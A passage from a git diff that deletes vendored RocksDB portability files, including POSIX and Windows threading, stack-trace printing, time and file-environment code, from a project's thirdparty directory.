-bool CondVar::TimedWait(uint64_t abs_time_us) {
-  struct timespec ts;
-  ts.tv_sec = static_cast<time_t>(abs_time_us / 1000000);
-  ts.tv_nsec = static_cast<suseconds_t>((abs_time_us % 1000000) * 1000);
-
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  int err = pthread_cond_timedwait(&cv_, &mu_->mu_, &ts);
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-  if (err == ETIMEDOUT) {
-    return true;
-  }
-  if (err != 0) {
-    PthreadCall("timedwait", err);
-  }
-  return false;
-}
-
-void CondVar::Signal() {
-  PthreadCall("signal", pthread_cond_signal(&cv_));
-}
-
-void CondVar::SignalAll() {
-  PthreadCall("broadcast", pthread_cond_broadcast(&cv_));
-}
-
-RWMutex::RWMutex() {
-  PthreadCall("init mutex", pthread_rwlock_init(&mu_, nullptr));
-}
-
-RWMutex::~RWMutex() { PthreadCall("destroy mutex", pthread_rwlock_destroy(&mu_)); }
-
-void RWMutex::ReadLock() { PthreadCall("read lock", pthread_rwlock_rdlock(&mu_)); }
-
-void RWMutex::WriteLock() { PthreadCall("write lock", pthread_rwlock_wrlock(&mu_)); }
-
-void RWMutex::ReadUnlock() { PthreadCall("read unlock", pthread_rwlock_unlock(&mu_)); }
-
-void RWMutex::WriteUnlock() { PthreadCall("write unlock", pthread_rwlock_unlock(&mu_)); }
-
-int PhysicalCoreID() {
-#if defined(ROCKSDB_SCHED_GETCPU_PRESENT) && defined(__x86_64__) && \
-    (__GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ >= 22))
-  // sched_getcpu uses VDSO getcpu() syscall since 2.22. I believe Linux offers VDSO
-  // support only on x86_64. This is the fastest/preferred method if available.
-  int cpuno = sched_getcpu();
-  if (cpuno < 0) {
-    return -1;
-  }
-  return cpuno;
-#elif defined(__x86_64__) || defined(__i386__)
-  // clang/gcc both provide cpuid.h, which defines __get_cpuid(), for x86_64 and i386.
-  unsigned eax, ebx = 0, ecx, edx;
-  if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx)) {
-    return -1;
-  }
-  return ebx >> 24;
-#else
-  // give up, the caller can generate a random number or something.
-  return -1;
-#endif
-}
-
-void InitOnce(OnceType* once, void (*initializer)()) {
-  PthreadCall("once", pthread_once(once, initializer));
-}
-
-void Crash(const std::string& srcfile, int srcline) {
-  fprintf(stdout, "Crashing at %s:%d\n", srcfile.c_str(), srcline);
-  fflush(stdout);
-  kill(getpid(), SIGTERM);
-}
-
-int GetMaxOpenFiles() {
-#if defined(RLIMIT_NOFILE)
-  struct rlimit no_files_limit;
-  if (getrlimit(RLIMIT_NOFILE, &no_files_limit) != 0) {
-    return -1;
-  }
-  // protect against overflow
-  if (no_files_limit.rlim_cur >= std::numeric_limits<int>::max()) {
-    return std::numeric_limits<int>::max();
-  }
-  return static_cast<int>(no_files_limit.rlim_cur);
-#endif
-  return -1;
-}
-
-void *cacheline_aligned_alloc(size_t size) {
-#if __GNUC__ < 5 && defined(__SANITIZE_ADDRESS__)
-  return malloc(size);
-#elif defined(_ISOC11_SOURCE)
-  return aligned_alloc(CACHE_LINE_SIZE, size);
-#elif ( _POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600 || defined(__APPLE__))
-  void *m;
-  errno = posix_memalign(&m, CACHE_LINE_SIZE, size);
-  return errno ? NULL : m;
-#else
-  return malloc(size);
-#endif
-}
-
-void cacheline_aligned_free(void *memblock) {
-  free(memblock);
-}
-
-
-}  // namespace port
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/port_posix.h b/thirdparty/rocksdb/port/port_posix.h
deleted file mode 100644
index fe0d426..0000000
--- a/thirdparty/rocksdb/port/port_posix.h
+++ /dev/null
@@ -1,210 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// See port_example.h for documentation for the following types/functions.
-
-#pragma once
-
-#include <thread>
-// size_t printf formatting named in the manner of C99 standard formatting
-// strings such as PRIu64
-// in fact, we could use that one
-#define ROCKSDB_PRIszt "zu"
-
-#define __declspec(S)
-
-#define ROCKSDB_NOEXCEPT noexcept
-
-#undef PLATFORM_IS_LITTLE_ENDIAN
-#if defined(OS_MACOSX)
-  #include <machine/endian.h>
-  #if defined(__DARWIN_LITTLE_ENDIAN) && defined(__DARWIN_BYTE_ORDER)
-    #define PLATFORM_IS_LITTLE_ENDIAN \
-        (__DARWIN_BYTE_ORDER == __DARWIN_LITTLE_ENDIAN)
-  #endif
-#elif defined(OS_SOLARIS)
-  #include <sys/isa_defs.h>
-  #ifdef _LITTLE_ENDIAN
-    #define PLATFORM_IS_LITTLE_ENDIAN true
-  #else
-    #define PLATFORM_IS_LITTLE_ENDIAN false
-  #endif
-  #include <alloca.h>
-#elif defined(OS_AIX)
-  #include <sys/types.h>
-  #include <arpa/nameser_compat.h>
-  #define PLATFORM_IS_LITTLE_ENDIAN (BYTE_ORDER == LITTLE_ENDIAN)
-  #include <alloca.h>
-#elif defined(OS_FREEBSD) || defined(OS_OPENBSD) || defined(OS_NETBSD) || \
-    defined(OS_DRAGONFLYBSD) || defined(OS_ANDROID)
-  #include <sys/endian.h>
-  #include <sys/types.h>
-  #define PLATFORM_IS_LITTLE_ENDIAN (_BYTE_ORDER == _LITTLE_ENDIAN)
-#else
-  #include <endian.h>
-#endif
-#include <pthread.h>
-
-#include <stdint.h>
-#include <string.h>
-#include <limits>
-#include <string>
-
-#ifndef PLATFORM_IS_LITTLE_ENDIAN
-#define PLATFORM_IS_LITTLE_ENDIAN (__BYTE_ORDER == __LITTLE_ENDIAN)
-#endif
-
-#if defined(OS_MACOSX) || defined(OS_SOLARIS) || defined(OS_FREEBSD) ||\
-    defined(OS_NETBSD) || defined(OS_OPENBSD) || defined(OS_DRAGONFLYBSD) ||\
-    defined(OS_ANDROID) || defined(CYGWIN) || defined(OS_AIX)
-// Use fread/fwrite/fflush on platforms without _unlocked variants
-#define fread_unlocked fread
-#define fwrite_unlocked fwrite
-#define fflush_unlocked fflush
-#endif
-
-#if defined(OS_MACOSX) || defined(OS_FREEBSD) ||\
-    defined(OS_OPENBSD) || defined(OS_DRAGONFLYBSD)
-// Use fsync() on platforms without fdatasync()
-#define fdatasync fsync
-#endif
-
-#if defined(OS_ANDROID) && __ANDROID_API__ < 9
-// fdatasync() was only introduced in API level 9 on Android. Use fsync()
-// when targeting older platforms.
-#define fdatasync fsync
-#endif
-
-namespace rocksdb {
-namespace port {
-
-// For use at db/file_indexer.h kLevelMaxIndex
-const int kMaxInt32 = std::numeric_limits<int32_t>::max();
-const uint64_t kMaxUint64 = std::numeric_limits<uint64_t>::max();
-const int64_t kMaxInt64 = std::numeric_limits<int64_t>::max();
-const size_t kMaxSizet = std::numeric_limits<size_t>::max();
-
-static const bool kLittleEndian = PLATFORM_IS_LITTLE_ENDIAN;
-#undef PLATFORM_IS_LITTLE_ENDIAN
-
-class CondVar;
-
-class Mutex {
- public:
-// We want to give users opportunity to default all the mutexes to adaptive if
-// not specified otherwise. This enables a quick way to conduct various
-// performance related experiements.
-//
-// NB! Support for adaptive mutexes is turned on by definining
-// ROCKSDB_PTHREAD_ADAPTIVE_MUTEX during the compilation. If you use RocksDB
-// build environment then this happens automatically; otherwise it's up to the
-// consumer to define the identifier.
-#ifdef ROCKSDB_DEFAULT_TO_ADAPTIVE_MUTEX
-  explicit Mutex(bool adaptive = true);
-#else
-  explicit Mutex(bool adaptive = false);
-#endif
-  ~Mutex();
-
-  void Lock();
-  void Unlock();
-  // this will assert if the mutex is not locked
-  // it does NOT verify that mutex is held by a calling thread
-  void AssertHeld();
-
- private:
-  friend class CondVar;
-  pthread_mutex_t mu_;
-#ifndef NDEBUG
-  bool locked_;
-#endif
-
-  // No copying
-  Mutex(const Mutex&);
-  void operator=(const Mutex&);
-};
-
-class RWMutex {
- public:
-  RWMutex();
-  ~RWMutex();
-
-  void ReadLock();
-  void WriteLock();
-  void ReadUnlock();
-  void WriteUnlock();
-  void AssertHeld() { }
-
- private:
-  pthread_rwlock_t mu_; // the underlying platform mutex
-
-  // No copying allowed
-  RWMutex(const RWMutex&);
-  void operator=(const RWMutex&);
-};
-
-class CondVar {
- public:
-  explicit CondVar(Mutex* mu);
-  ~CondVar();
-  void Wait();
-  // Timed condition wait.  Returns true if timeout occurred.
-  bool TimedWait(uint64_t abs_time_us);
-  void Signal();
-  void SignalAll();
- private:
-  pthread_cond_t cv_;
-  Mutex* mu_;
-};
-
-using Thread = std::thread;
-
-static inline void AsmVolatilePause() {
-#if defined(__i386__) || defined(__x86_64__)
-  asm volatile("pause");
-#elif defined(__aarch64__)
-  asm volatile("wfe");
-#elif defined(__powerpc64__)
-  asm volatile("or 27,27,27");
-#endif
-  // it's okay for other platforms to be no-ops
-}
-
-// Returns -1 if not available on this platform
-extern int PhysicalCoreID();
-
-typedef pthread_once_t OnceType;
-#define LEVELDB_ONCE_INIT PTHREAD_ONCE_INIT
-extern void InitOnce(OnceType* once, void (*initializer)());
-
-#ifndef CACHE_LINE_SIZE
-  #if defined(__s390__)
-    #define CACHE_LINE_SIZE 256U
-  #elif defined(__powerpc__) || defined(__aarch64__)
-    #define CACHE_LINE_SIZE 128U
-  #else
-    #define CACHE_LINE_SIZE 64U
-  #endif
-#endif
-
-
-extern void *cacheline_aligned_alloc(size_t size);
-
-extern void cacheline_aligned_free(void *memblock);
-
-#define ALIGN_AS(n) alignas(n)
-
-#define PREFETCH(addr, rw, locality) __builtin_prefetch(addr, rw, locality)
-
-extern void Crash(const std::string& srcfile, int srcline);
-
-extern int GetMaxOpenFiles();
-
-} // namespace port
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/stack_trace.cc b/thirdparty/rocksdb/port/stack_trace.cc
deleted file mode 100644
index baaf140..0000000
--- a/thirdparty/rocksdb/port/stack_trace.cc
+++ /dev/null
@@ -1,138 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "port/stack_trace.h"
-
-#if defined(ROCKSDB_LITE) || !(defined(ROCKSDB_BACKTRACE) || defined(OS_MACOSX)) || \
-    defined(CYGWIN) || defined(OS_FREEBSD) || defined(OS_SOLARIS)
-
-// noop
-
-namespace rocksdb {
-namespace port {
-void InstallStackTraceHandler() {}
-void PrintStack(int first_frames_to_skip) {}
-}  // namespace port
-}  // namespace rocksdb
-
-#else
-
-#include <execinfo.h>
-#include <signal.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <cxxabi.h>
-
-namespace rocksdb {
-namespace port {
-
-namespace {
-
-#ifdef OS_LINUX
-const char* GetExecutableName() {
-  static char name[1024];
-
-  char link[1024];
-  snprintf(link, sizeof(link), "/proc/%d/exe", getpid());
-  auto read = readlink(link, name, sizeof(name) - 1);
-  if (-1 == read) {
-    return nullptr;
-  } else {
-    name[read] = 0;
-    return name;
-  }
-}
-
-void PrintStackTraceLine(const char* symbol, void* frame) {
-  static const char* executable = GetExecutableName();
-  if (symbol) {
-    fprintf(stderr, "%s ", symbol);
-  }
-  if (executable) {
-    // out source to addr2line, for the address translation
-    const int kLineMax = 256;
-    char cmd[kLineMax];
-    snprintf(cmd, kLineMax, "addr2line %p -e %s -f -C 2>&1", frame, executable);
-    auto f = popen(cmd, "r");
-    if (f) {
-      char line[kLineMax];
-      while (fgets(line, sizeof(line), f)) {
-        line[strlen(line) - 1] = 0;  // remove newline
-        fprintf(stderr, "%s\t", line);
-      }
-      pclose(f);
-    }
-  } else {
-    fprintf(stderr, " %p", frame);
-  }
-
-  fprintf(stderr, "\n");
-}
-#elif defined(OS_MACOSX)
-
-void PrintStackTraceLine(const char* symbol, void* frame) {
-  static int pid = getpid();
-  // out source to atos, for the address translation
-  const int kLineMax = 256;
-  char cmd[kLineMax];
-  snprintf(cmd, kLineMax, "xcrun atos %p -p %d  2>&1", frame, pid);
-  auto f = popen(cmd, "r");
-  if (f) {
-    char line[kLineMax];
-    while (fgets(line, sizeof(line), f)) {
-      line[strlen(line) - 1] = 0;  // remove newline
-      fprintf(stderr, "%s\t", line);
-    }
-    pclose(f);
-  } else if (symbol) {
-    fprintf(stderr, "%s ", symbol);
-  }
-
-  fprintf(stderr, "\n");
-}
-
-#endif
-
-}  // namespace
-
-void PrintStack(int first_frames_to_skip) {
-  const int kMaxFrames = 100;
-  void* frames[kMaxFrames];
-
-  auto num_frames = backtrace(frames, kMaxFrames);
-  auto symbols = backtrace_symbols(frames, num_frames);
-
-  for (int i = first_frames_to_skip; i < num_frames; ++i) {
-    fprintf(stderr, "#%-2d  ", i - first_frames_to_skip);
-    PrintStackTraceLine((symbols != nullptr) ? symbols[i] : nullptr, frames[i]);
-  }
-  free(symbols);
-}
-
-static void StackTraceHandler(int sig) {
-  // reset to default handler
-  signal(sig, SIG_DFL);
-  fprintf(stderr, "Received signal %d (%s)\n", sig, strsignal(sig));
-  // skip the top three signal handler related frames
-  PrintStack(3);
-  // re-signal to default handler (so we still get core dump if needed...)
-  raise(sig);
-}
-
-void InstallStackTraceHandler() {
-  // just use the plain old signal as it's simple and sufficient
-  // for this use case
-  signal(SIGILL, StackTraceHandler);
-  signal(SIGSEGV, StackTraceHandler);
-  signal(SIGBUS, StackTraceHandler);
-  signal(SIGABRT, StackTraceHandler);
-}
-
-}  // namespace port
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/port/stack_trace.h b/thirdparty/rocksdb/port/stack_trace.h
deleted file mode 100644
index f1d4f1f..0000000
--- a/thirdparty/rocksdb/port/stack_trace.h
+++ /dev/null
@@ -1,19 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-namespace rocksdb {
-namespace port {
-
-// Install a signal handler to print callstack on the following signals:
-// SIGILL SIGSEGV SIGBUS SIGABRT
-// Currently supports linux only. No-op otherwise.
-void InstallStackTraceHandler();
-
-// Prints stack, skips skip_first_frames frames
-void PrintStack(int first_frames_to_skip = 0);
-
-}  // namespace port
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/sys_time.h b/thirdparty/rocksdb/port/sys_time.h
deleted file mode 100644
index 1e2ad0f..0000000
--- a/thirdparty/rocksdb/port/sys_time.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This file is a portable substitute for sys/time.h which does not exist on
-// Windows
-
-#ifndef STORAGE_LEVELDB_PORT_SYS_TIME_H_
-#define STORAGE_LEVELDB_PORT_SYS_TIME_H_
-
-#if defined(OS_WIN) && defined(_MSC_VER)
-
-#include <time.h>
-
-namespace rocksdb {
-
-namespace port {
-
-// Avoid including winsock2.h for this definition
-typedef struct timeval {
-  long tv_sec;
-  long tv_usec;
-} timeval;
-
-void gettimeofday(struct timeval* tv, struct timezone* tz);
-
-inline struct tm* localtime_r(const time_t* timep, struct tm* result) {
-  errno_t ret = localtime_s(result, timep);
-  return (ret == 0) ? result : NULL;
-}
-}
-
-using port::timeval;
-using port::gettimeofday;
-using port::localtime_r;
-}
-
-#else
-#include <time.h>
-#include <sys/time.h>
-#endif
-
-#endif  // STORAGE_LEVELDB_PORT_SYS_TIME_H_
diff --git a/thirdparty/rocksdb/port/util_logger.h b/thirdparty/rocksdb/port/util_logger.h
deleted file mode 100644
index a8255ad..0000000
--- a/thirdparty/rocksdb/port/util_logger.h
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_LEVELDB_PORT_UTIL_LOGGER_H_
-#define STORAGE_LEVELDB_PORT_UTIL_LOGGER_H_
-
-// Include the appropriate platform specific file below.  If you are
-// porting to a new platform, see "port_example.h" for documentation
-// of what the new port_<platform>.h file must provide.
-
-#if defined(ROCKSDB_PLATFORM_POSIX)
-#include "env/posix_logger.h"
-#elif defined(OS_WIN)
-#include "port/win/win_logger.h"
-#endif
-
-#endif  // STORAGE_LEVELDB_PORT_UTIL_LOGGER_H_
diff --git a/thirdparty/rocksdb/port/win/env_default.cc b/thirdparty/rocksdb/port/win/env_default.cc
deleted file mode 100644
index 52a984f..0000000
--- a/thirdparty/rocksdb/port/win/env_default.cc
+++ /dev/null
@@ -1,42 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <mutex>
-
-#include <rocksdb/env.h>
-#include "port/win/env_win.h"
-
-namespace rocksdb {
-namespace port {
-
-// We choose to create this on the heap and using std::once for the following
-// reasons
-// 1) Currently available MS compiler does not implement atomic C++11
-// initialization of
-//    function local statics
-// 2) We choose not to destroy the env because joining the threads from the
-// system loader
-//    which destroys the statics (same as from DLLMain) creates a system loader
-//    dead-lock.
-//    in this manner any remaining threads are terminated OK.
-namespace {
-  std::once_flag winenv_once_flag;
-  Env* envptr;
-};
-
-}
-
-Env* Env::Default() {
-  using namespace port;
-  std::call_once(winenv_once_flag, []() { envptr = new WinEnv(); });
-  return envptr;
-}
-
-}
-
diff --git a/thirdparty/rocksdb/port/win/env_win.cc b/thirdparty/rocksdb/port/win/env_win.cc
deleted file mode 100644
index 4621488..0000000
--- a/thirdparty/rocksdb/port/win/env_win.cc
+++ /dev/null
@@ -1,1127 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/env_win.h"
-#include "port/win/win_thread.h"
-#include <algorithm>
-#include <ctime>
-#include <thread>
-
-#include <errno.h>
-#include <process.h> // _getpid
-#include <io.h> // _access
-#include <direct.h> // _rmdir, _mkdir, _getcwd
-#include <sys/types.h>
-#include <sys/stat.h>
-
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-
-#include "port/port.h"
-#include "port/dirent.h"
-#include "port/win/win_logger.h"
-#include "port/win/io_win.h"
-
-#include "monitoring/iostats_context_imp.h"
-
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-
-#include <rpc.h>  // for uuid generation
-#include <windows.h>
-
-namespace rocksdb {
-
-ThreadStatusUpdater* CreateThreadStatusUpdater() {
-  return new ThreadStatusUpdater();
-}
-
-namespace {
-
-// RAII helpers for HANDLEs
-const auto CloseHandleFunc = [](HANDLE h) { ::CloseHandle(h); };
-typedef std::unique_ptr<void, decltype(CloseHandleFunc)> UniqueCloseHandlePtr;
-
-void WinthreadCall(const char* label, std::error_code result) {
-  if (0 != result.value()) {
-    fprintf(stderr, "pthread %s: %s\n", label, strerror(result.value()));
-    abort();
-  }
-}
-
-}
-
-namespace port {
-
-WinEnvIO::WinEnvIO(Env* hosted_env)
-  :   hosted_env_(hosted_env),
-      page_size_(4 * 1012),
-      allocation_granularity_(page_size_),
-      perf_counter_frequency_(0),
-      GetSystemTimePreciseAsFileTime_(NULL) {
-
-  SYSTEM_INFO sinfo;
-  GetSystemInfo(&sinfo);
-
-  page_size_ = sinfo.dwPageSize;
-  allocation_granularity_ = sinfo.dwAllocationGranularity;
-
-  {
-    LARGE_INTEGER qpf;
-    BOOL ret = QueryPerformanceFrequency(&qpf);
-    assert(ret == TRUE);
-    perf_counter_frequency_ = qpf.QuadPart;
-  }
-
-  HMODULE module = GetModuleHandle("kernel32.dll");
-  if (module != NULL) {
-    GetSystemTimePreciseAsFileTime_ = (FnGetSystemTimePreciseAsFileTime)GetProcAddress(
-      module, "GetSystemTimePreciseAsFileTime");
-  }
-}
-
-WinEnvIO::~WinEnvIO() {
-}
-
-Status WinEnvIO::DeleteFile(const std::string& fname) {
-  Status result;
-
-  if (_unlink(fname.c_str())) {
-    result = IOError("Failed to delete: " + fname, errno);
-  }
-
-  return result;
-}
-
-Status WinEnvIO::GetCurrentTime(int64_t* unix_time) {
-  time_t time = std::time(nullptr);
-  if (time == (time_t)(-1)) {
-    return Status::NotSupported("Failed to get time");
-  }
-
-  *unix_time = time;
-  return Status::OK();
-}
-
-Status WinEnvIO::NewSequentialFile(const std::string& fname,
-  std::unique_ptr<SequentialFile>* result,
-  const EnvOptions& options) {
-  Status s;
-
-  result->reset();
-
-  // Corruption test needs to rename and delete files of these kind
-  // while they are still open with another handle. For that reason we
-  // allow share_write and delete(allows rename).
-  HANDLE hFile = INVALID_HANDLE_VALUE;
-
-  DWORD fileFlags = FILE_ATTRIBUTE_READONLY;
-
-  if (options.use_direct_reads && !options.use_mmap_reads) {
-    fileFlags |= FILE_FLAG_NO_BUFFERING;
-  }
-
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(
-      fname.c_str(), GENERIC_READ,
-      FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL,
-      OPEN_EXISTING,  // Original fopen mode is "rb"
-      fileFlags, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("Failed to open NewSequentialFile" + fname,
-      lastError);
-  } else {
-    result->reset(new WinSequentialFile(fname, hFile, options));
-  }
-  return s;
-}
-
-Status WinEnvIO::NewRandomAccessFile(const std::string& fname,
-  std::unique_ptr<RandomAccessFile>* result,
-  const EnvOptions& options) {
-  result->reset();
-  Status s;
-
-  // Open the file for read-only random access
-  // Random access is to disable read-ahead as the system reads too much data
-  DWORD fileFlags = FILE_ATTRIBUTE_READONLY;
-
-  if (options.use_direct_reads && !options.use_mmap_reads) {
-    fileFlags |= FILE_FLAG_NO_BUFFERING;
-  } else {
-    fileFlags |= FILE_FLAG_RANDOM_ACCESS;
-  }
-
-  /// Shared access is necessary for corruption test to pass
-  // almost all tests would work with a possible exception of fault_injection
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile =
-      CreateFileA(fname.c_str(), GENERIC_READ,
-      FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
-      NULL, OPEN_EXISTING, fileFlags, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    return IOErrorFromWindowsError(
-      "NewRandomAccessFile failed to Create/Open: " + fname, lastError);
-  }
-
-  UniqueCloseHandlePtr fileGuard(hFile, CloseHandleFunc);
-
-  // CAUTION! This will map the entire file into the process address space
-  if (options.use_mmap_reads && sizeof(void*) >= 8) {
-    // Use mmap when virtual address-space is plentiful.
-    uint64_t fileSize;
-
-    s = GetFileSize(fname, &fileSize);
-
-    if (s.ok()) {
-      // Will not map empty files
-      if (fileSize == 0) {
-        return IOError(
-          "NewRandomAccessFile failed to map empty file: " + fname, EINVAL);
-      }
-
-      HANDLE hMap = CreateFileMappingA(hFile, NULL, PAGE_READONLY,
-        0,  // Whole file at its present length
-        0,
-        NULL);  // Mapping name
-
-      if (!hMap) {
-        auto lastError = GetLastError();
-        return IOErrorFromWindowsError(
-          "Failed to create file mapping for NewRandomAccessFile: " + fname,
-          lastError);
-      }
-
-      UniqueCloseHandlePtr mapGuard(hMap, CloseHandleFunc);
-
-      const void* mapped_region =
-        MapViewOfFileEx(hMap, FILE_MAP_READ,
-        0,  // High DWORD of access start
-        0,  // Low DWORD
-        fileSize,
-        NULL);  // Let the OS choose the mapping
-
-      if (!mapped_region) {
-        auto lastError = GetLastError();
-        return IOErrorFromWindowsError(
-          "Failed to MapViewOfFile for NewRandomAccessFile: " + fname,
-          lastError);
-      }
-
-      result->reset(new WinMmapReadableFile(fname, hFile, hMap, mapped_region,
-        fileSize));
-
-      mapGuard.release();
-      fileGuard.release();
-    }
-  } else {
-    result->reset(new WinRandomAccessFile(fname, hFile, page_size_, options));
-    fileGuard.release();
-  }
-  return s;
-}
-
-Status WinEnvIO::OpenWritableFile(const std::string& fname,
-  std::unique_ptr<WritableFile>* result,
-  const EnvOptions& options,
-  bool reopen) {
-
-  const size_t c_BufferCapacity = 64 * 1024;
-
-  EnvOptions local_options(options);
-
-  result->reset();
-  Status s;
-
-  DWORD fileFlags = FILE_ATTRIBUTE_NORMAL;
-
-  if (local_options.use_direct_writes && !local_options.use_mmap_writes) {
-    fileFlags = FILE_FLAG_NO_BUFFERING;
-  }
-
-  // Desired access. We are want to write only here but if we want to memory
-  // map
-  // the file then there is no write only mode so we have to create it
-  // Read/Write
-  // However, MapViewOfFile specifies only Write only
-  DWORD desired_access = GENERIC_WRITE;
-  DWORD shared_mode = FILE_SHARE_READ;
-
-  if (local_options.use_mmap_writes) {
-    desired_access |= GENERIC_READ;
-  }
-  else {
-    // Adding this solely for tests to pass (fault_injection_test,
-    // wal_manager_test).
-    shared_mode |= (FILE_SHARE_WRITE | FILE_SHARE_DELETE);
-  }
-
-  // This will always truncate the file
-  DWORD creation_disposition = CREATE_ALWAYS;
-  if (reopen) {
-    creation_disposition = OPEN_ALWAYS;
-  }
-
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(
-      fname.c_str(),
-      desired_access,  // Access desired
-      shared_mode,
-      NULL,           // Security attributes
-      creation_disposition,  // Posix env says (reopen) ? (O_CREATE | O_APPEND) : O_CREAT | O_TRUNC
-      fileFlags,      // Flags
-      NULL);          // Template File
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    return IOErrorFromWindowsError(
-      "Failed to create a NewWriteableFile: " + fname, lastError);
-  }
-
-  // We will start writing at the end, appending
-  if (reopen) {
-    LARGE_INTEGER zero_move;
-    zero_move.QuadPart = 0;
-    BOOL ret = SetFilePointerEx(hFile, zero_move, NULL, FILE_END);
-    if (!ret) {
-      auto lastError = GetLastError();
-      return IOErrorFromWindowsError(
-        "Failed to create a ReopenWritableFile move to the end: " + fname, lastError);
-    }
-  }
-
-  if (options.use_mmap_writes) {
-    // We usually do not use mmmapping on SSD and thus we pass memory
-    // page_size
-    result->reset(new WinMmapFile(fname, hFile, page_size_,
-      allocation_granularity_, local_options));
-  } else {
-    // Here we want the buffer allocation to be aligned by the SSD page size
-    // and to be a multiple of it
-    result->reset(new WinWritableFile(fname, hFile, page_size_,
-      c_BufferCapacity, local_options));
-  }
-  return s;
-}
-
-Status WinEnvIO::NewRandomRWFile(const std::string & fname,
-  std::unique_ptr<RandomRWFile>* result, const EnvOptions & options) {
-
-  Status s;
-
-  // Open the file for read-only random access
-  // Random access is to disable read-ahead as the system reads too much data
-  DWORD desired_access = GENERIC_READ | GENERIC_WRITE;
-  DWORD shared_mode = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE;
-  DWORD creation_disposition = OPEN_ALWAYS; // Create if necessary or open existing
-  DWORD file_flags = FILE_FLAG_RANDOM_ACCESS;
-
-  if (options.use_direct_reads && options.use_direct_writes) {
-    file_flags |= FILE_FLAG_NO_BUFFERING;
-  }
-
-  /// Shared access is necessary for corruption test to pass
-  // almost all tests would work with a possible exception of fault_injection
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile =
-      CreateFileA(fname.c_str(),
-        desired_access,
-        shared_mode,
-        NULL, // Security attributes
-        creation_disposition,
-        file_flags,
-        NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    return IOErrorFromWindowsError(
-      "NewRandomRWFile failed to Create/Open: " + fname, lastError);
-  }
-
-  UniqueCloseHandlePtr fileGuard(hFile, CloseHandleFunc);
-  result->reset(new WinRandomRWFile(fname, hFile, page_size_, options));
-  fileGuard.release();
-
-  return s;
-}
-
-Status WinEnvIO::NewDirectory(const std::string& name,
-  std::unique_ptr<Directory>* result) {
-  Status s;
-  // Must be nullptr on failure
-  result->reset();
-  // Must fail if directory does not exist
-  if (!DirExists(name)) {
-    s = IOError("Directory does not exist: " + name, EEXIST);
-  } else {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    result->reset(new WinDirectory);
-  }
-  return s;
-}
-
